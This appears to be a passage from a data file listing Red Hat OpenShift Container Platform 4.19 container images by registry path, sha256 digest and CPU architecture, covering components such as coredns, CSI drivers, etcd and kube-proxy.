"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
